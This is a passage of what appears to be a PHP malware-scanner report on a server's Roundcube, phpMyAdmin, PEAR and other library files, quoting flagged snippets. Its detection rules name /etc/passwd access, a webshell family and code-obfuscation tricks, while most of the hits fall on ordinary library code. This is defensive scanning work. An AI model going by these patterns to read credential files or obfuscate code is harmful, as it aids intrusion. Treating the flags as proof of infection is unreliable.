proc_open("$dovecotpw -s '$method'", $spec, $pipes); if (!is_resource($pipe)) { return false; } fwrite($pipes[0], $password . "\n", 1+strlen($password)); usleep(1000); fwrite($pipes[0], $password . "\n", 1+strlen($password)); $crypted = trim(stream_get_contents($pipes[1]), "\n"); fclose($pipes[0]); fclose($pipes[1]); proc_close($pipe); if (!preg_match('/^\{' . $method . '\}/', $crypted)) { return false; } if (!$prefixed) { $prefixed = (bool) $rcmail->config->get('password_dovecotpw_with_method')...
|
|
//usr/share/roundcubemail/plugins/password/drivers/virtualmin.php Size: 2.50 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec("$curdir/chgvirtualminpasswd list-domains --mail-user $username --name-only", $output_domain, $returnvalue); if ($returnvalue == 0 && count($output_domain) == 1) { $domain = trim($output_domain[0]); } else { rcube::raise_error(array( 'code' => 600, 'file' => __FILE__, 'line' => __LINE__, 'message' => "Password plugin: Unable to execute $curdir/chgvirtualminpasswd or domain for mail-user '$username' not known to Virtualmin" ), true, false); return PASSWORD_ERROR; } $domain = escapeshellarg($...
|
|
//usr/share/roundcubemail/plugins/password/drivers/dbmail.php Size: 1.93 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command, $output, $return_value); if ($return_value == 0) { return PASSWORD_SUCCESS; } rcube::raise_error(array( 'code' => 600, 'type' => 'php', 'file' => __FILE__, 'line' => __LINE__, 'message' => "Password plugin: Unable to execute $curdir/chgdbmailusers" ), true, false)
|
|
//usr/share/roundcubemail/plugins/password/drivers/ldap_ppolicy.php Size: 3.47 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Warns: 1
| Description | Match |
|---|
Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($cmd, $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $uri."\n"); fwrite($pipes[0], $baseDN."\n"); fwrite($pipes[0], $filter."\n"); fwrite($pipes[0], $bindDN."\n"); fwrite($pipes[0], $bindPW."\n"); fwrite($pipes[0], $username."\n"); fwrite($pipes[0], $currpass."\n"); fwrite($pipes[0], $newpass."\n"); fwrite($pipes[0], $cafile); fclose($pipes[0]); $result = stream_get_contents($pipes[1]); fclose($pipes[1]); $this->_debug('Policy result: ' . $result); switch ($re...
|
|
//usr/share/roundcubemail/plugins/filesystem_attachments/filesystem_attachments.php Size: 8.37 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Dangers: 2
| Description | Match |
|---|
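Exploit etc_passwd Line: 19 Dangerous The `/etc/passwd` file on Unix systems contains password information; an attacker who has accessed the `/etc/passwd` file may attempt a brute-force attack on all passwords on the system (on most current systems the password hashes themselves are stored in `/etc/shadow`, so the exposure depends on how the host stores them) |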
/etc/passwd
| Sign b236d073 Line: 19 Dangerous Malware Signature (hash: b236d073) |
/etc/passwd
|
|
//usr/share/roundcubemail/plugins/managesieve/lib/Roundcube/rcube_sieve_engine.php Size: 139.26 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 536 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/roundcubemail/vendor/kolab/net_ldap3/lib/Net/LDAP3.php Size: 110.41 kB Created: 2019-10-21 14:18:59 Modified: 2021-06-12 16:03:27 Warns: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command, $output, $return_code); $this->_debug("LDAP: Command output:" . var_export($output, true)); $this->_debug("Return code: " . $return_code); if ($return_code) { $this->_error("Command $moz_ldapsearch returned error code: $return_code"); return null; } $lines = array(); foreach ($output as $line_num => $line) { if (substr($line, 0, 1) == " ") { $lines[count($lines)-1] .= trim($line); } else { $lines[] = trim($line); } } $attributes = array( 'dn' => $subject_dn, 'attributelevelrights'...
| Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog($level, implode("\n", $msg)); } } private function _encode_attrs($attributes) { if (isset($attributes['userpassword'])) { $attributes['userpassword'] = '*'; } return json_encode($attributes); } public static function quote_string($str, $is_dn = false, $reverse = false) { if (is_array($str)) { $str = reset($str); } if ($is_dn) { $replace = array( ',' => '\2c', '=' => '\3d', '+' => '\2b', '<' => '\3c', '>' => '\3e', ';' => '\3b', "\\"=> '\5c', '"' => '\22', '#' => '\23' ); } else { $replace...
|
|
//usr/share/roundcubemail/vendor/pear/pear-core-minimal/src/PEAR.php Size: 35.34 kB Created: 2019-11-19 22:00:24 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//usr/share/roundcubemail/vendor/pear/pear-core-minimal/src/PEAR/ErrorStack.php Size: 33.02 kB Created: 2019-11-19 22:00:24 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//usr/share/roundcubemail/vendor/pear/pear-core-minimal/src/OS/Guess.php Size: 10.64 kB Created: 2019-11-19 22:00:24 Modified: 2021-06-12 16:03:27 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//usr/share/roundcubemail/vendor/pear/net_ldap2/Net/LDAP2/Search.php Size: 18.64 kB Created: 2015-10-30 23:34:22 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("array_multisort($sort_params \$to_sort);"); } return $to_sort; } public function sorted($attrs = array('cn'), $order = SORT_ASC) { $return = array(); $sorted = $this->sorted_as_struct($attrs, $order); if (PEAR::isError($sorted)) { return $sorted; } foreach ($sorted as $key => $row) { $entry = $this->_ldap->getEntry($row['dn'], $this->searchedAttrs()); if (!PEAR::isError($entry)) { array_push($return, $entry); } else { return $entry; } } return $return; } public function as_struct() { $retu...
|
|
//usr/share/roundcubemail/vendor/pear/console_commandline/Console/CommandLine/Action/Password.php Size: 2.70 kB Created: 2020-04-16 18:04:15 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system('stty -echo'); @flock(STDIN, LOCK_EX); $passwd = fgets(STDIN); @flock(STDIN, LOCK_UN); system('stty echo'); } return trim($passwd)
|
|
//usr/share/roundcubemail/vendor/pear/auth_sasl/Auth/SASL/SCRAM.php Size: 12.25 kB Created: 2017-03-07 17:37:05 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$data', 'return hash("' . $hashes[$hash] . '", $data, TRUE);'); $this->hmac = create_function('$key,$str,$raw', 'return hash_hmac("' . $hashes[$hash] . '", $str, $key, $raw);'); } elseif ($hash == 'md5') { $this->hash = create_function('$data', 'return md5($data, true);'); $this->hmac = array($this, '_HMAC_MD5'); } elseif (in_array($hash, array('sha1', 'sha-1'))) { $this->hash = create_function('$data', 'return sha1($data, true);'); $this->hmac = array($this, '_HMAC_SHA1'); } el...
|
|
//usr/share/roundcubemail/vendor/pear/crypt_gpg/Crypt/GPG/ProcessControl.php Size: 4.19 kB Created: 2020-03-22 14:49:18 Modified: 2021-06-12 16:03:27 Warns: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command); $parts = explode(',', $result); $running = (count($parts) > 1 && trim($parts[1], '"') == $this->pid); } else { $result = exec('ps -p ' . escapeshellarg($this->pid) . ' -o pid='); $running = (trim($result) == $this->pid); } return $running; } public function terminate() { if (function_exists('posix_kill')) { posix_kill($this->pid, 15); } elseif (PHP_OS === 'WINNT') { exec('taskkill /PID ' . escapeshellarg($this->pid)); } else { exec('kill -15 ' . escapeshellarg($this->pid))
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] |
posix_kill($this->pid, 15); } elseif (PHP_OS === 'WINNT') { exec('taskkill /PID ' . escapeshellarg($this->pid)); } else { exec('kill -15 ' . escapeshellarg($this->pid))
|
|
//usr/share/roundcubemail/vendor/pear/crypt_gpg/Crypt/GPG/Engine.php Size: 65.58 kB Created: 2020-03-22 14:49:18 Modified: 2021-06-12 16:03:27 Warns: 4
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid(posix_getuid()); $this->_homedir = $info['dir'].'/.gnupg'; } else { if (isset($_SERVER['HOME'])) { $this->_homedir = $_SERVER['HOME']; } else { $this->_homedir = getenv('HOME'); } } if ($this->_homedir === false) { throw new Crypt_GPG_FileException( 'Could not locate homedir. Please specify the homedir ' . 'to use with the \'homedir\' option when instantiating ' . 'the Crypt_GPG object.' ); } } if (!is_dir($this->_homedir)) { if (@mkdir($this->_homedir, 0777, true)) { chmod($this-...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($this->_process); if ($exitCode < 0 && $status && !$status['running']) { $exitCode = $status['exitcode']; } if ($exitCode > 0) { $this->_debug( '=> subprocess returned an unexpected exit code: ' . $exitCode ); } $this->_process = null; $this->_pipes = array(); if (is_resource($this->_input)) { fclose($this->_input); } if (is_resource($this->_output)) { fclose($this->_output); } $this->_processHandler->throwException($exitCode); } $this->_closeAgentLaunchProcess(); if ($this->_agentInf...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($this->_process); $exitCode = proc_close($this->_process); if ($exitCode < 0 && $status && !$status['running']) { $exitCode = $status['exitcode']; } if ($exitCode > 0) { $this->_debug( '=> subprocess returned an unexpected exit code: ' . $exitCode ); } $this->_process = null; $this->_pipes = array(); if (is_resource($this->_input)) { fclose($this->_input); } if (is_resource($this->_output)) { fclose($this->_output); } $this->_processHandler->throwException($exitCode); } $this->_c...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open( $agentCommandLine, $agentDescriptorSpec, $this->_agentPipes, null, $env, array('binary_pipes' => true) ); if (!is_resource($this->_agentProcess)) { throw new Crypt_GPG_OpenSubprocessException( 'Unable to open gpg-agent subprocess.', 0, $agentCommandLine ); } $agentInfo = fread($this->_agentPipes[self::FD_OUTPUT], self::CHUNK_SIZE); if ($version21) { $agentInfo .= "\n" . fread($this->_agentPipes[self::FD_ERROR], self::CHUNK_SIZE); } if ($agentInfo) { foreach (explode("\n", $agentInfo) ...
|
|
//usr/share/roundcubemail/vendor/roundcube/plugin-installer/src/Roundcube/Composer/PluginInstaller.php Size: 11.66 kB Created: 2020-11-02 23:04:07 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getcwd() . "/vendor/bin/rcubeinitdb.sh --package=$plugin_name --dir=$sqldir"); } } if (!empty($extra['roundcube']['post-install-script'])) { $self->rcubeRunScript($extra['roundcube']['post-install-script'], $package); } }; $promise = parent::install($repo, $package); if ($promise instanceof PromiseInterface) { return $promise->then($postInstall); } $postInstall(); } public function update(InstalledRepositoryInterface $repo, PackageInterface $initial, PackageInterface $target) { $this->rcu...
|
|
//usr/share/roundcubemail/installer/check.php Size: 8.91 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:25 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 65 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/doc/php-pecl-memcache-3.0.8/memcache.php Size: 28.43 kB Created: 2013-04-08 06:12:54 Modified: 2020-09-18 10:16:23 Dangers: 2
|
//usr/share/doc/git-1.8.3.1/contrib/mw-to-git/t/install-wiki/LocalSettings.php Size: 4.29 kB Created: 2013-06-11 00:01:55 Modified: 2020-09-08 13:22:11 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 122 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/phpMyAdmin/test/classes/plugin/import/ImportLdi_test.php Size: 6.89 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
| Description | Match |
|---|
Sign 91535293 Line: 245 Dangerous Malware Signature (hash: 91535293) |
LOAD DATA LOCAL INFILE
|
|
//usr/share/phpMyAdmin/test/classes/PMA_ServerStatusData_test.php Size: 3.70 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_databases_test.php Size: 8.15 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/rte/PMA_EVN_getQueryFromRequest_test.php Size: 5.71 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_processes_test.php Size: 7.08 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_queries_test.php Size: 6.57 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/core/PMA_securePath_test.php Size: 873.00 B Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 2
| Description | Match |
|---|
Exploit etc_passwd Line: 27 Dangerous The `/etc/passwd` file on Unix systems contains password information; an attacker who has accessed the `/etc/passwd` file may attempt a brute-force attack on all passwords on the system |
/etc/passwd
| Sign b236d073 Line: 27 Dangerous Malware Signature (hash: b236d073) |
/etc/passwd
|
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_monitor_test.php Size: 11.50 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_variables_test.php Size: 6.85 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_replication_test.php Size: 7.99 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 2
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_privileges_test.php Size: 66.23 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_advisor_test.php Size: 5.20 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_test.php Size: 7.09 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/server_privileges.php Size: 12.37 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 2
|
//usr/share/phpMyAdmin/server_status.php Size: 980.00 B Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/server_replication.php Size: 2.06 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/server_status_processes.php Size: 1.97 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/import.php Size: 25.11 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 91535293 Line: 9 Dangerous Malware Signature (hash: 91535293) |
LOAD DATA LOCAL INFILE
|
|
//usr/share/phpMyAdmin/server_status_queries.php Size: 1.72 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/db_structure.php Size: 10.31 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/server_status_monitor.php Size: 3.37 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/index.php Size: 20.95 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
| Description | Match |
|---|
Sign 471b95ee Line: 613 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
| Sign 471b95ee Line: 616 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/phpMyAdmin/server_status_variables.php Size: 1.57 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/server_status_advisor.php Size: 986.00 B Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/server_status_variables.lib.php Size: 28.86 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/DBQbe.class.php Size: 55.38 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 886 Warning Double var technique is usually used for the obfuscation of malicious code |
${$or}
|
|
//usr/share/phpMyAdmin/libraries/replication_gui.lib.php Size: 38.20 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/core.lib.php Size: 31.79 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 597 Dangerous Malware Signature (hash: 0f37c730) |
meta http-equiv="Refresh" content="0;
|
|
//usr/share/phpMyAdmin/libraries/server_variables.lib.php Size: 54.90 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/DatabaseInterface.class.php Size: 102.86 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 632 Warning Double var technique is usually used for the obfuscation of malicious code |
${$sort_by}
|
|
//usr/share/phpMyAdmin/libraries/tbl_info.inc.php Size: 3.45 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 100 Warning Double var technique is usually used for the obfuscation of malicious code |
${$each_create_option[0]}
|
|
//usr/share/phpMyAdmin/libraries/rte/rte_events.lib.php Size: 23.73 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/build_html_for_db.lib.php Size: 6.10 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 122 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$stat['description_function']($current[$stat_name])
|
|
//usr/share/phpMyAdmin/libraries/ServerStatusData.class.php Size: 14.24 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/server_privileges.lib.php Size: 153.53 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/server_status.lib.php Size: 9.71 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/sysinfo.lib.php Size: 8.36 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec('kstat -p d ' . $key)) { list(, $value) = preg_split("/\t/", trim($m), 2); return $value; } else { return ''; } } public function loadavg() { $load1 = $this->_kstat('unix:0:system_misc:avenrun_1min'); return array('loadavg' => $load1); } public function supported() { return @is_readable('/proc/meminfo'); } public function memory() { $pagesize = $this->_kstat('unix:0:seg_cache:slab_size'); $mem = array(); $mem['MemTotal'] = $this->_kstat('unix:0:system_pages:pagestotal') * $pagesize; $...
|
|
//usr/share/phpMyAdmin/libraries/sql-formatter/lib/SqlFormatter.php Size: 44.21 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/server_databases.lib.php Size: 14.46 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
| Description | Match |
|---|
Exploit nano Line: 263 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$stat['description_function']($stat['footer'])
| Function strrev eval_strrev Line: 389 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
lave
|
|
//usr/share/phpMyAdmin/libraries/structure.lib.php Size: 111.12 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/logging.lib.php Size: 567.00 B Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Function apache_note Warning Potentially dangerous function `apache_note` [https://www.php.net/apache_note] |
apache_note('userID', $user); apache_note('userStatus', $status)
|
|
//usr/share/phpMyAdmin/libraries/dbi/DBIDummy.class.php Size: 29.85 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/Advisor.class.php Size: 14.99 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$value = ' . $expr . ';'); $err = ob_get_contents(); } catch (Exception $e) { $err = $e->getMessage(); } ob_end_clean(); if ($err) { throw new Exception( strip_tags($err) . '<br />Executed code: $value = ' . htmlspecialchars($expr) . ';' ); } return $value; } public static function parseRulesFile() { $file = file('libraries/advisory_rules.txt', FILE_IGNORE_NEW_LINES); $errors = array(); $rules = array(); $lines = array(); $ruleSyntax = array( 'name', 'formula', 'test', 'issue', 'recommenda...
|
|
//usr/share/phpMyAdmin/libraries/replication.inc.php Size: 8.76 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/config.default.php Size: 63.07 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 50 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//usr/share/phpMyAdmin/libraries/config/messages.inc.php Size: 45.91 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 760 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//usr/share/phpMyAdmin/libraries/config/setup.forms.php Size: 10.78 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 123 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//usr/share/phpMyAdmin/libraries/config/user_preferences.forms.php Size: 8.58 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 55 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//usr/share/phpMyAdmin/libraries/plugins/transformations/abstract/ExternalTransformationsPlugin.class.php Size: 4.60 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 2
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($process); } if ($options[2] == 1 || $options[2] == '2') { $retstring = htmlspecialchars($newstring); } else { $retstring = $newstring; } return $retstring; } public static function getName()
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($program . ' ' . $options[1], $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $buffer); fclose($pipes[0]); while (!feof($pipes[1])) { $newstring .= fgets($pipes[1], 1024); } fclose($pipes[1]); proc_close($process); } if ($options[2] == 1 || $options[2] == '2') { $retstring = htmlspecialchars($newstring); } else { $retstring = $newstring; } return $retstring; } public static function getName()
|
|
//usr/share/phpMyAdmin/libraries/common.inc.php Size: 36.02 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 1160 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//usr/share/phpMyAdmin/libraries/Util.class.php Size: 157.06 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Dangers: 2
| Description | Match |
|---|
Sign 471b95ee Line: 1813 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
| Sign 471b95ee Line: 1814 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/phpMyAdmin/libraries/sqlparser.data.php Size: 19.33 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/php/Net/LDAP3.php Size: 108.03 kB Created: 2018-09-17 15:14:01 Modified: 2020-07-22 14:48:07 Warns: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command, $output, $return_code); $this->_debug("LDAP: Command output:" . var_export($output, true)); $this->_debug("Return code: " . $return_code); if ($return_code) { $this->_error("Command $moz_ldapsearch returned error code: $return_code"); return null; } $lines = array(); foreach ($output as $line_num => $line) { if (substr($line, 0, 1) == " ") { $lines[count($lines)-1] .= trim($line); } else { $lines[] = trim($line); } } if ($this->vendor_name() == "Oracle Corporation") { foreach ($li...
| Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog($level, implode("\n", $msg)); } } private static function _ber_addseq($str, $identifier) { $len = dechex(strlen($str)/2); if (strlen($len) % 2 != 0) { $len = '0'.$len; } return $identifier . $len . $str; } private static function _ber_encode_int($offset) { $val = dechex($offset); $prefix = ''; if (preg_match('/^[89abcdef]/', $val)) { $prefix = '00'; } if (strlen($val)%2 != 0) { $prefix .= '0'; } return $prefix . $val; } public static function quote_string($str, $is_dn = false, $reverse = ...
|
|
//usr/share/php/tcpdf/include/tcpdf_colors.php Size: 14.35 kB Created: 2018-10-16 20:24:05 Modified: 2020-07-22 14:48:16 Dangers: 1
|
//usr/share/php/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2018-10-16 20:24:05 Modified: 2020-07-22 14:48:16 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//usr/share/php/gettext/gettext.php Size: 12.35 kB Created: 2016-11-29 10:39:51 Modified: 2020-07-22 14:48:07 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("$string"); if ($plural >= $total) $plural = $total - 1; return $plural; } function ngettext($single, $plural, $number) { if ($this->short_circuit) { if ($number != 1) return $plural; else return $single; } $select = $this->select_string($number); $key = $single . chr(0) . $plural; if ($this->enable_cache) { if (! array_key_exists($key, $this->cache_translations)) { return ($number != 1) ? $plural : $single; } else { $result = $this->cache_translations[$key]; $list = explode(chr(0), $result...
|
|
//usr/share/awstats/tools/nginx/awstats-fcgi.php Size: 967.00 B Created: 2016-12-03 15:58:28 Modified: 2021-06-12 16:03:21 Warns: 2 Dangers: 1
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($process); } else { header('Status: 500 Internal Server Error'); echo('Internal Server Error'); } } else { header('Status: 404 Page Not Found'); echo('Page Not Found')
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
